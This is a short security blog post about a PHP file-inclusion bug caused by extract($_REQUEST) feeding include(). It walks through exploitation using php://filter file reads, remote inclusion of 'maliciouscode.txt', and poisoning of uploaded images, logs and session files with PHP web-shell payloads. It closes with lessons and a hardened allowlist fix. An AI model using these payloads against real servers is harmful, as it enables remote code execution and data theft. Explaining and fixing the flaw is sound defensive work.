Local/Remote File Inclusion vulnerability

January 22, 2014 10:18 pm 0 comments

Found yet another bug:

<?php
include("config.php");
include($header);
extract($_REQUEST);   // turns every request key into a local variable
...
include($footer);

anything suspicious?

It is possible to pass ?footer=SOME_FILE in the request, and that value ends up as the argument of the include() call.

There are many ways to exploit this:

You can read files with
?footer=php://filter/convert.base64-encode/resource=ANY_LOCAL_FILE

You can also read remote files if allow_url_include is set to true
?footer=http://example.tld/maliciouscode.txt

But the system I’ve found this bug in didn’t have allow_url_include enabled, and it didn’t have PHP filters either, because those were only introduced in PHP 5. There is still a way to exploit it anyway.

If you are able to upload files to the server (usually you can upload them in forums), you can upload an image with a malicious payload inside its EXIF headers or its PNG IDAT chunks, and include that file like so:
?footer=../../path/to/forum/images/your_cute_avatar.png

If that’s not possible, you can always send a GET request to the server and include /var/log/httpd/access_log, or send a mail and include /var/log/maillog. But sometimes there are not enough permissions to read /var/log. You shouldn’t stop trying!

If the server sets a PHPSESSID cookie, you can include
/var/lib/php/session/sess_PHPSESSID (sessions are stored in files by default)

Then find out which variables are stored there. If you are as lucky as I am, you could change some variable such as username to something like “<?php echo phpinfo(); ?>”, re-login to update the session, and then include the session file to find out whether disable_functions is in effect. After that there are two ways:

1) if system/exec functions are disabled, you can change your username to:
“<?php $_GET[0]($_POST[1]); ?>”

2) otherwise change your username to:
“<?php system($_POST[1]); ?>”

Then you can do whatever you want with the system.

Lessons learned:
1) Never believe user input
2) Never believe user input
3) Never believe user input

P.S. Or at least use extract($_REQUEST, EXTR_SKIP) so that variables which already exist don’t get overwritten.
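For comparison, here is the vulnerable pattern from the post next to a hardened version of the footer include. This is an added example, not code from the post or the affected system; the template directory, the file names and the allowlist keys are assumptions.

```php
<?php
// Added example (not the original post's code). Paths and names are assumed.

// --- Vulnerable, as in the post: extract() lets ?footer=... reach include()
function render_vulnerable(): void
{
    include 'config.php';
    extract($_REQUEST);   // $footer is now whatever the request said
    include $footer;      // local/remote file inclusion sink
}

// --- Hardened: request data selects a key, never a path.
// Keys may come from the request; values are fixed files the app controls.
const FOOTERS = [
    'default' => 'footer.php',
    'print'   => 'footer_print.php',
];

function resolve_footer(string $name, string $baseDir): ?string
{
    if (!array_key_exists($name, FOOTERS)) {
        return null;                       // unknown key: refuse
    }
    // Defence in depth: realpath() returns false for php://, http:// and
    // missing files, and the prefix check rejects anything outside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . FOOTERS[$name]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_hardened(): void
{
    $name = (isset($_GET['footer']) && is_string($_GET['footer']))
        ? $_GET['footer'] : 'default';
    $footer = resolve_footer($name, __DIR__ . '/templates');
    if ($footer === null) {
        http_response_code(400);
        exit;
    }
    include $footer;      // only ever one of the allowlisted files
}
```

EXTR_SKIP only protects variables that are already defined when extract() runs; if $footer is first assigned after the extract() call, or never assigned by config.php, the request still wins, whereas the allowlist above never lets request data name a file.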
